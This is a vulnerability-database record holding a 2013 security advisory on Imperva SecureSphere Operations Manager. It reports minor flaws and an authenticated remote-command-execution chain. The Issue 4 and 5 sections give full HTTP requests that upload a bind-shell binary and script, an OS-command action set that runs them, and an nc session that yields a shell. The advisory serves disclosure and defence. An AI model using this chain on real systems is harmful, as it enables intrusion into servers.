DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:25977", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities", "description": "", "published": "2013-06-05T00:00:00", "modified": "2013-06-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/25977", "reporter": "Pedro Andujar", "references": [], "cvelist": ["2013-4091", "2013-4092", "2013-4093", "2013-4094", "2013-4095"], "immutableFields": [], "lastseen": "2022-08-16T08:44:46", "viewCount": 18, "enchantments": {"dependencies": {}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678800746}, "_internal": {"score_hash": "58e234e6c86a78efcd43e1f671a5955c"}, "sourceHref": "https://www.exploit-db.com/download/25977", "sourceData": "Original: http://www.digitalsec.net/stuff/explt+advs/Imperva-SecureSphere.OptMgr.txt\r\n\r\n\r\n ===============================\r\n - Advisory -\r\n ===============================\r\n\r\n Tittle: Imperva SecureSphere Operations Manager - Command\r\nExecution (Post Authentication) & Minor issues\r\n Risk: High\r\n Date: 27.May.2013\r\n Author: Pedro Andujar\r\n\r\n\r\n.: [ INTRO ] :.\r\n\r\nSecureSphere Operations Manager (SOM) is a multi-domain, federated\r\nmanagement solution that dramatically improves the operational\r\nefficiency of managing SecureSphere deployments with multiple MX\r\nManagement Servers. SOM meets the operational scalability\r\ndemands of large enterprises and Managed Security Service Providers by\r\nconsolidating the management, visibility and reporting\r\nacross multiple SecureSphere MX Management Servers, and provides\r\nsystem wide health metrics and statistics.\r\n\r\n\r\n.: [ TECHNICAL DESCRIPTION ] :.\r\n\r\nImperva SecureSphere Operations Manager version 9.0.0.5 Enterprise\r\nEdition and probably others are prone to several security issues\r\nas described below;\r\n\r\n\r\n.: [ ISSUE #1 }:.\r\n\r\nName: Autocomplete atribute not disabled in login page\r\nSeverity: Low\r\n\r\nAUTOCOMPLETE is not disabled on the /secsphLogin.jsp page. This\r\nprevents the web browser specifically caching the username and\r\nj_password fields.\r\n\r\n<tr> <td style=\"width: 120px\"> <h1 class=\"login\">User:</h1> </td> <td>\r\n<input size=30 id=\"username\" type='text' name='j_username'\r\nstyle=\"width:172px\" value=\"andujarp\" />\r\n<script>document.getElementById(\"username\").focus()</script>\r\n</td> </tr> <tr>\r\n<td style=\"width: 120px\">\r\n<h1 class=\"login\">Password:</h1>\r\n</td> <td>\r\n<input size=30 type='password' name='j_password' style=\"width:172px\"/>\r\n\r\n\r\n.: [ ISSUE #2 }:.\r\n\r\nName: Sensitive information is passed as parameter in URL\r\nSeverity: Low\r\n\r\nAs part of the login process, the assigned session ID is revealed as a\r\nURL parameter.\r\n\r\nGET /SecureSphere/secsphLogin.jsp;jsessionid=8B4AE9F3C99049824D4AEBBF61DEF6A5\r\nHTTP/1.1\r\n\r\n\r\nAdditionally, the some credentials are revealed as a URL parameter\r\nwhen trying to get the details of a sensor device:\r\n\r\nGET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773&j_username=SOM-user&remote_login_attempt=true&active_mom_user=andujarp\r\n\r\n\r\n\r\n.: [ ISSUE #3 }:.\r\n\r\nName: Physical Path Disclosure\r\nSeverity: Low\r\n\r\nThe SecureSpere web application discloses sensitive system\r\ninformation, including file path information, through its exposed\r\nfunctionality.\r\nSpecifically, the\r\n/SecureSphere/dwr/call/plaincall/AsyncOperationsContainer.getOperationState.dwr\r\nurl resource shows the internal\r\nroot path of the underlying Application Server;\r\n\r\nHTTP/1.1 200 OK\r\nContent-type: text/javascript;charset=utf-8\r\nContent-Length: 554\r\nDate: Thu, 25 Oct 2013 04:41:38 GMT\r\nServer: NA\r\n\r\nthrow 'allowScriptTagRemoting is false.';\r\n//#DWR-INSERT\r\n//#DWR-REPLY\r\nvar s0={};var s1=[];s0['file_size']=\"412\r\nKB\";s0.filePath=\"/opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/webapps/SecureSphere/WEB-INF/reptempt/25CB2F79E342E89AD9A7CFF51AA17F10/1338152502622932642/export.imf\"\r\n\r\nSee also ISSUE #4, where additional file path disclosure occurs.\r\n\r\n\r\n\r\n.: [ ISSUE #4 }:.\r\n\r\nName: Insufficients checks on file upload\r\nSeverity: High\r\n\r\nThe SecureSpere web application file upload functionality from the\r\n.Key Management. section doesn't provide an adequate security control\r\nof the uploaded\r\nfiles, thus allowing an external attacker to upload arbitraty content\r\ninto the server. This can be used as an attacker in combination with\r\nadditional\r\nvulnerabilities in the application to compromise the Host.\r\n\r\nWhen trying to upload an invalid file in the Key Management section,\r\nthe application shows the full internal path of the application\r\nserver. Additionally,\r\nit effectively uploads the file, despite being a wrong filetype.\r\n\r\nThe example below shows the file upload functionality outputting an\r\nerror when the file gets uploaded, additionally revelaing the upload\r\nfilename and its\r\ninternal path within the system. A Linux x86_64 ELF port 2222 bind\r\nshell and additional shell script are uploaded to /var/tmp dir:\r\n\r\n\r\nPOST /SecureSphere/plain/settings.html?__targetView=details&extraParams[Key]=T/keyManagement\r\nHTTP/1.1\r\nHost: x.x.x.x:8083\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nReferer: https://x.x.x.x:8083/SecureSphere/ui/main.html\r\nCookie: JSESSIONID=CBAD5B77716363AFC961614AC32CAD4D\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------6997088307399657971245517506\r\nContent-Length: 1011\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"def_name\"\r\ndefault_key_pair_fips_2\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"private_key\"; filename=\"bndsh\"\r\nContent-Type: application/octet-stream\r\nELF > x@@@8 @@$ j)Xj _j ^HR $ ziHj Zj1Xj2XH1j+XHj ^Hj!Xuj;XH/bin/shSHRWH\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"public_key\"; filename=\"script\"\r\nContent-Type: application/octet-stream\r\nfile file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file\r\n; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf\r\ntarget.file\r\n-----------------------------6997088307399657971245517506\r\nContent-Disposition: form-data; name=\"password\"\r\n12321323\r\n-----------------------------6997088307399657971245517506----------------------------------------------------\r\n\r\n\r\n\r\nHTTP/1.1 200 OK\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nCache-Control: no-cache\r\nCache-Control: no-store\r\nContent-Type: text/xml;charset=UTF-8\r\nContent-Language: en\r\nContent-Length: 315\r\nDate: Fri, 26 Oct 2012 04:38:17 GMT\r\nServer: NA\r\n<errors> <global-errors> <global-error path=\"page\">\r\nAn error occurred while importing keys: Failed to load PEM key from\r\n'/var/tmp/com.mprv.secsph.utils.io1217840423292804321upload.file'..</global-error>\r\n</global-errors> <field-errors> </field-errors> </errors>\r\n\r\n\r\n\r\n.: [ ISSUE #5 }:.\r\n\r\nName: Insufficients checks on Action Set (OS command)\r\nSeverity: High\r\n\r\nThe SecureSphere web applicaiton allows users to create Action Sets\r\nvia the Policies sub menu. Action Sets are components used to define\r\nthe actions taken\r\nby SecureSphere when specific conditions are met. Action sets include\r\nsession blocks, SNMP traps, sys-tem logs, email, FTP Archive, OS\r\nCommand, etc. An\r\nattacker can control the execution of commands by creating a task,\r\nsetting an OS command action on assignee change and cycling through\r\ncommands by continuous\r\nmodification of the task assignee. The OS command action allows the\r\nuser to supply very limited commands and arguments to the server host\r\nand have these\r\ncommands executed within the context of the .mxserver. user. The\r\napplication host is running a modified version of Red Hat Linux, with\r\nmany networking and\r\nscripting tools installed by default. Due to insufficient host\r\nhardening and application sandboxing, an attacker is able to execute\r\ncommands. Combining the\r\nfile upload vulnerability explained in issue 4, an attacker can copy\r\nbackdoor into the server filesystem and get it executed through this\r\nissue, opening a\r\nshell access to the host as the .mxserver. user. The attacker is able\r\nto use this foothold into the host to elevate privileges, view and\r\nmodify source code,\r\nobtain system and application credentials, etc.\r\n\r\n\r\nPOST /SecureSphere/plain/actionsets.html HTTP/1.1\r\nHost: x.x.x.x:8083\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nX-Requested-With: XMLHttpRequest\r\nX-Prototype-Version: 1.4.0\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\npreffered_encoding: utf-8\r\nReferer: https://x.x.x.x:8083/SecureSphere/ui/main.html\r\nContent-Length: 5223\r\nCookie: JSESSIONID=ABD89957C38AD685A881670E31A7BF1A\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n__targetView=details&currentState=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].momSettingsComponent.addToNewMxs=true\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionInterface=E/secsph/action-interface\\0x5B@dn=\\0x27OsCommandAI\\0x27\\0x5D\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].name=rvshell&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map\r\n[5143764432078707607].actionParams.ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions.map[5143764432078707607]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\\r\n0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map\r\n\r\n[command].value=/usr/bin/find\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,\r\nactions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[command]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\\r\n0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].name=command&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map\r\n[5143764432078707607].actionParams.parameters.map\r\n\r\n[arguments].value=-name file\\* -exec sh {} \\;\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\\r\n0x5D,actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[arguments]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\\r\n0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].name=arguments&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map\r\n\r\n[workingDir].value=/var/tmp\r\n\r\n&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions.map[5143764432078707607].actionParams&data\r\n[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B\r\n@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[workingDir]&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir]\r\n.name=workingDir&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].value=true&data[actionsets][/secsph/action-set\\0x5B\r\n@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D,actions\r\n.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways]\r\n.parameterMetadata=E/secsph/generic-action-interface-metadata\\0x5B@dn=\\0x27OsCommand\\0x27\\0x5D,interfaceParameters.map[shouldRunAlways]&data[actionsets][/secsph/action-set\\0x5B@dn=\r\n\\0x271914115513\\0x27\\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].name=shouldRunAlways&data[actionsets][/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D]\r\n.actions.map[5143764432078707607].ownerTable=E/secsph/action-set\\0x5B@dn=\\0x271914115513\\0x27\\0x5D&_=\r\n\r\n\r\nIn the example above, we have set an event action-set, and as soon the\r\nevent happens it will launch the predefined action (/usr/bin/find .\r\n-exec sh {})\r\nwhich will execute sh over all the files existing in /var/tmp. As we\r\nwere able to upload arbitrary content within the local filesystem by\r\nmeans of the\r\nissue 4, the following script that was previously uploaded will be\r\nexecuted as well:\r\n\r\nfile file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file\r\n; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf\r\ntarget.file\r\n\r\nThe script will find, rename and execute the bind tcp shell that was\r\nuploaded before, allowing us to access through an interactive Linux\r\nshell in port 2222,\r\nwith the privileges of mxserver.\r\n\r\n\r\n[crg@fogheaven ~]$ nc x.x.x.x 2222\r\nuname -a;id\r\nLinux xxxxx.xxxx.xx 2.6.18-164.15.1.el5.impl #1 SMP Tue Apr 27\r\n20:46:55 IDT 2010 x86_64 x86_64 x86_64 GNU/Linux\r\nuid=502(mxserver)gid=505(mxserver)groups=505(mxservers)\r\n\r\n\r\n\r\n\r\n.: [ CHANGELOG ] :.\r\n\r\n * 25/Oct/2012: - Audit done, reported to client.\r\n * 27/May/2013: - Sent to Imperva.\r\n * 02/Jun/2013: - Public Disclosure.\r\n\r\n.: [ SOLUTIONS ] :.\r\n\r\nN/A\r\n\r\n\r\n.: [ REFERENCES ] :.\r\n\r\n [+] Imperva SecureSphere Operations Manager\r\n http://www.imperva.com/products/mgt_operations-manager.html\r\n\r\n [+] Security Target Document\r\n http://www.niap-ccevs.org/st/st_vid10466-st.pdf\r\n\r\n [+] Ernst & Young Advanced Security Centre - Melbourne\r\n http://www.ey.com/security/\r\n\r\n [+] !dSR - Digital Security Research\r\n http://www.digitalsec.net/\r\n\r\n\r\n\r\n\r\n -=EOF=-", "osvdbidlist": ["93827", "93826", "93825", "93824", "93823"], "exploitType": "webapps", "verified": false}

{}